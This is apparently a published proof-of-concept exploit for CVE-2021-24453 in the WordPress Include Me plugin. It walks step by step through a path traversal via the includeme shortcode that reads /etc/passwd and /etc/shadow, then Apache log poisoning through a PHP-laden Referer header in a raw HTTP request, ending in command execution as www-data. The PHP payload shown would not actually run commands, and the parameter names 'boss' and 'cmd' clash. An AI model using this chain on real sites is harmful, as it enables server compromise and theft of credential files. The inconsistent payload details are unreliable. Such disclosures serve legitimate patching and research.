Include Me <= 1.2.1 – Authenticated Remote Code Execution (RCE) via LFI log poisoning | CVE 2021-24453

Description

The plugin is vulnerable to path traversal / local file inclusion, which can lead to Remote Code Execution (RCE) of the system due to log poisoning and therefore potentially a full compromise of the underlying structure

Proof of Concept

# RCE through chaining LFI with log poisoning

# 1. Path Traversal / Local File Inclusion

# Authenticate as any user, which can create blog posts on wordpress
# for example, user with "author" role
# create a new wordpress blog post
# copy paste the following content on your blog post and visit your newly created page:

[includeme file="/../../../../etc/passwd" value="This is a basic path traversal poc"]

# contents of /etc/passwd will be displayed

# 2. log poisoning

# PoC was constructed with the LAMPP stack on Ubuntu 20.04 LTS. LAMPP has the apache2 error log file under /opt/lampp/logs/error_log, which will be used for demonstration purpose
# however, please note that the default apache2 log can be found under /var/log/apache2/access.log
# if you don't use the LAMPP stack, please use /var/log/apache2/access.log for the log poisoning part
# reference: https://www.hackingarticles.in/apache-log-poisoning-through-lfi/

# First, we are trying to open a restricted file like /etc/shadow to get an entry on /opt/lampp/logs/error_log. The "error_log" file is reflecting the HTTP "referrer" header, therefore we can inject arbitrary PHP functions into the "referrer" to get Remote Code Execution
# open Burp Suite to intercept the request, append the payload to the "referrer" field
# payload (without the quotes): ";<?php $_GET['cmd'];?>"

POST /wordpress/wp-json/wp/v2/posts/116?_locale=user HTTP/1.1
Host: localhost
Content-Length: 303
Accept: application/json, */*;q=0.1
X-WP-Nonce: 7eb92e9895
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: http://localhost
Referer: http://localhost/wordpress/wp-admin/post.php?post=116&action=edit;<?php $_GET['boss'];?>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5d1e5a05b96398a14a61f963d4699ca9=BossisBack%7C1624379188%7CafC9qioiHNrTPEtqjzjgXuW96F0014a9TLOBz8b0phV%7C2e28994b4d0cd0574000263018f2f266877b3124fb65c91f63e49ea6df92b095; wp-settings-2=mfold%3Do; wp-settings-time-2=1624206389
dnt: 1
sec-gpc: 1
Connection: close

{"id":116,"content":"<!-- wp:paragraph -->\n<p>test page</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[includeme file=\"../../../../etc/shadow\" value=\"My name is Stefano\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->"}

# on the same blog post, change the file back to

[includeme file="../../../../opt/lampp/logs/error_log" value="test"]

# now, the GET parameter "cmd" can be used to execute system commands
# append "?cmd=id" to the URL of your published blog post
# for example:

$ curl http://localhost/wordpress/2021/06/20/myblogpost/?cmd=id

# uid=33(www-data) gid=33(www-data) groups=33(www-data)